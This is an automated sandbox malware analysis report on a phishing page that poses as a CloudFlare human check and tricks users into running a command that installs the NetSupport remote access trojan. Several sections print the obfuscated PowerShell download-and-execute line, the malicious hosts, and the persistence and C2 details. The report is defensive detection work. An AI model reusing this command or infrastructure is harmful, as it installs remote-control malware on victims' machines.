Windows Analysis Report
https://inspyrehomedesign.com/Ray-verify.html

Overview

General Information

Sample URL: https://inspyrehomedesign.com/Ray-verify.html
Analysis ID: 1544089
Infos:

Detection

NetSupport RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected phishing page
Detect drive by download via clipboard copy & paste
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Contains functionality to change the wallpaper
Delayed program exit found
Downloads files with wrong headers with respect to MIME Content-Type
Powershell drops PE file
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses ipconfig to lookup or modify the Windows network settings
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTML page contains hidden javascript code
HTML page contains string obfuscation
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 3008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6832 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1896,i,2740781035066481159,16273883810358689985,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6436 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://inspyrehomedesign.com/Ray-verify.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • mshta.exe (PID: 7848 cmdline: "C:\Windows\system32\mshta.exe" https://inspyrehomedesign.com/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 3293'' MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 7944 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ipconfig.exe (PID: 8128 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
      • cmd.exe (PID: 8152 cmdline: "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\user\AppData\Roaming\bpsFyf MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • attrib.exe (PID: 8176 cmdline: attrib +h C:\Users\user\AppData\Roaming\bpsFyf MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • client32.exe (PID: 7368 cmdline: "C:\Users\user\AppData\Roaming\bpsFyf\client32.exe" MD5: EE75B57B9300AAB96530503BFAE8A2F2)
  • rundll32.exe (PID: 7448 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\bpsFyf\pcicapi.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\bpsFyf\PCICHEK.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\bpsFyf\client32.exe | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\bpsFyf\HTCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\bpsFyf\TCCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

Source | Rule | Description | Author | Strings
00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000015.00000002.2405808800.0000000000D12000.00000002.00000001.01000000.0000000E.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000015.00000000.1975726137.0000000000D12000.00000002.00000001.01000000.0000000E.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

Source | Rule | Description | Author | Strings
21.2.client32.exe.73d70000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
21.0.client32.exe.d10000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
21.2.client32.exe.73d50000.4.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
21.2.client32.exe.111b79e0.1.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
21.2.client32.exe.111b79e0.1.raw.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

Source | Rule | Description | Author | Strings
amsi64_7944.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

                                  System Summary

                                  Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X , CommandLine|base64offset|contains: ", Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://inspyrehomedesign.com/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 3293'', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7848, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X , ProcessId: 7944, ProcessName: powershell.exe
                                  Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7944, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft
                                  Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7944, TargetFilename: C:\Users\user\AppData\Roaming\bpsFyf\HTCTL32.DLL
                                  Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X , CommandLine|base64offset|contains: ", Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://inspyrehomedesign.com/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 3293'', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7848, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X , ProcessId: 7944, ProcessName: powershell.exe

                                  Remote Access Functionality

                                  Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7944, TargetFilename: C:\Users\user\AppData\Roaming\bpsFyf\NSM.LIC
                                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                                  2024-10-28T19:46:17.038167+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP
                                  2024-10-28T19:46:17.218232+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP
                                  2024-10-28T19:46:18.039720+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP
                                  2024-10-28T19:46:19.280274+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP
                                  2024-10-28T19:46:19.443100+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP
                                  2024-10-28T19:46:19.676594+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP
                                  2024-10-28T19:46:19.838942+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP
                                  2024-10-28T19:46:20.094216+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP
                                  2024-10-28T19:46:20.317348+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP
                                  2024-10-28T19:46:25.238092+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP
                                  2024-10-28T19:46:25.701188+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP
                                  2024-10-28T19:46:26.502458+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP

                                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                                  2024-10-28T19:45:13.415753+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49729 | 92.255.85.135 | 443 | TCP

                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe | Code function: 21_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,21_2_110AD570

                                  Phishing

                                  Source: https://inspyrehomedesign.com/ | LLM: Score: 9 Reasons: The brand 'CloudFlare' is well-known and typically associated with the domain 'cloudflare.com'., The provided URL 'inspyrehomedesign.com' does not match the legitimate domain for CloudFlare., The URL does not contain any elements that suggest a direct association with CloudFlare., The input fields and instructions provided are unusual for a legitimate CloudFlare service, indicating potential phishing tactics., The domain name 'inspyrehomedesign.com' does not suggest any connection to CloudFlare, raising suspicion. DOM: 2.3.pages.csv
                                  Source: https://inspyrehomedesign.com/ | LLM: Score: 9 Reasons: The brand 'CloudFlare' is well-known and typically associated with the domain 'cloudflare.com'., The provided URL 'inspyrehomedesign.com' does not match the legitimate domain for CloudFlare., The URL does not contain any elements that suggest a direct association with CloudFlare., The URL appears to be unrelated to the CloudFlare brand, suggesting a potential phishing attempt., The input fields labeled as 'unknown' do not provide any context or association with CloudFlare services. DOM: 2.2.pages.csv
                                  Source: https://inspyrehomedesign.com/ | HTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#fc574a" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#fc574a" d="M17.038 18.615H14.87L14.563 9.5h2....
                                  Source: https://inspyrehomedesign.com/Ray-verify.htmlHTTP Parser: Found new string: script /*............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................*/var ppconf=0;var qy7='';qy8=String.fromCharCode(13,10,13,10);for...
                                  Source: https://inspyrehomedesign.com/Ray-verify.html | HTTP Parser: No favicon
                                  Source: https://inspyrehomedesign.com/ | HTTP Parser: No favicon
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe | File opened: C:\Users\user\AppData\Roaming\bpsFyf\MSVCR100.dll
                                  Source: unknown | HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49712 version: TLS 1.2
                                  Source: unknown | HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49713 version: TLS 1.2
                                  Source: unknown | HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49714 version: TLS 1.2
                                  Source: unknown | HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49723 version: TLS 1.2
                                  Source: unknown | HTTPS traffic detected: 166.1.160.75:443 -> 192.168.2.16:49724 version: TLS 1.2
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000015.00000002.2429888490.0000000073D72000.00000002.00000001.01000000.00000010.sdmp, PCICHEK.DLL.12.dr
                                  Source: Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 00000015.00000002.2427957833.0000000073C41000.00000020.00000001.01000000.00000012.sdmp, msvcr100.dll.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmp, HTCTL32.DLL.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000015.00000002.2405808800.0000000000D12000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000015.00000000.1975726137.0000000000D12000.00000002.00000001.01000000.0000000E.sdmp, client32.exe.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmp, HTCTL32.DLL.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000015.00000002.2429698530.0000000073D55000.00000002.00000001.01000000.00000011.sdmp, pcicapi.dll.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.12.dr
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe | Code function: 21_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,21_2_1102D330
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe | Code function: 21_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,21_2_11065890
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe | Code function: 21_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,21_2_1106A0A0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe | Code function: 21_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,21_2_111266E0

                                  Networking

                                  Source: Network traffic | Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.16:49729 -> 92.255.85.135:443
                                  Source: httpImage file has PE prefix: HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Mon, 28 Oct 2024 18:46:19 GMT Content-Type: image/png Content-Length: 18808 Last-Modified: Mon, 21 Oct 2024 07:35:56 GMT Connection: keep-alive ETag: "6716045c-4978" Accept-Ranges: bytes
                                  Source: httpImage file has PE prefix: HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Mon, 28 Oct 2024 18:46:25 GMT Content-Type: image/png Content-Length: 77280 Last-Modified: Mon, 21 Oct 2024 07:35:58 GMT Connection: keep-alive ETag: "6716045e-12de0" Accept-Ranges: bytes
                                  Source: httpImage file has PE prefix: HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Mon, 28 Oct 2024 18:46:25 GMT Content-Type: image/png Content-Length: 396664 Last-Modified: Mon, 21 Oct 2024 07:35:59 GMT Connection: keep-alive ETag: "6716045f-60d78" Accept-Ranges: bytes
                                  Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
                                  Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Mon, 28 Oct 2024 18:46:19 GMT Content-Type: image/png Content-Length: 18808 Last-Modified: Mon, 21 Oct 2024 07:35:56 GMT Connection: keep-alive ETag: "6716045c-4978" Accept-Ranges: bytes
                                  Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Mon, 28 Oct 2024 18:46:25 GMT Content-Type: image/png Content-Length: 77280 Last-Modified: Mon, 21 Oct 2024 07:35:58 GMT Connection: keep-alive ETag: "6716045e-12de0" Accept-Ranges: bytes
                                  Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Mon, 28 Oct 2024 18:46:25 GMT Content-Type: image/png Content-Length: 396664 Last-Modified: Mon, 21 Oct 2024 07:35:59 GMT Connection: keep-alive ETag: "6716045f-60d78" Accept-Ranges: bytes
                                  Source: global traffic HTTP traffic detected: GET /o/o.png HTTP/1.1 Host: traversecityspringbreak.com Connection: Keep-Alive
                                  Source: global traffic HTTP traffic detected: GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
                                  Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.16:49726 -> 166.1.160.211:80
                                  Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
                                  Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
                                  Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
                                  Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.10
                                  Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: global traffic HTTP traffic detected: GET /Ray-verify.html HTTP/1.1 Host: inspyrehomedesign.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
                                  Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1 Host: inspyrehomedesign.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://inspyrehomedesign.com/Ray-verify.html Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
                                  Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
                                  Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=raZlZsppxEvfrBh&MD=OrKVw8+R HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
                                  Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
                                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: inspyrehomedesign.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
                                  Source: global traffic HTTP traffic detected: GET /t8b1Qdw/1q.png HTTP/1.1 Host: i.ibb.co Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://inspyrehomedesign.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
                                  Source: global traffic HTTP traffic detected: GET /t8b1Qdw/1q.png HTTP/1.1 Host: i.ibb.co Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: */* Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
                                  Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=raZlZsppxEvfrBh&MD=OrKVw8+R HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
                                  Source: global traffic HTTP traffic detected: GET /Ray-verify.html HTTP/1.1 Accept: */* Accept-Language: en-CH UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: inspyrehomedesign.com Connection: Keep-Alive
                                  Source: global traffic HTTP traffic detected: GET /o/o.png HTTP/1.1 Host: traversecityspringbreak.com Connection: Keep-Alive
                                  Source: global traffic HTTP traffic detected: GET /o/1.png HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: traversecityspringbreak.com
                                  Source: global traffic HTTP traffic detected: GET /o/2.png HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: traversecityspringbreak.com
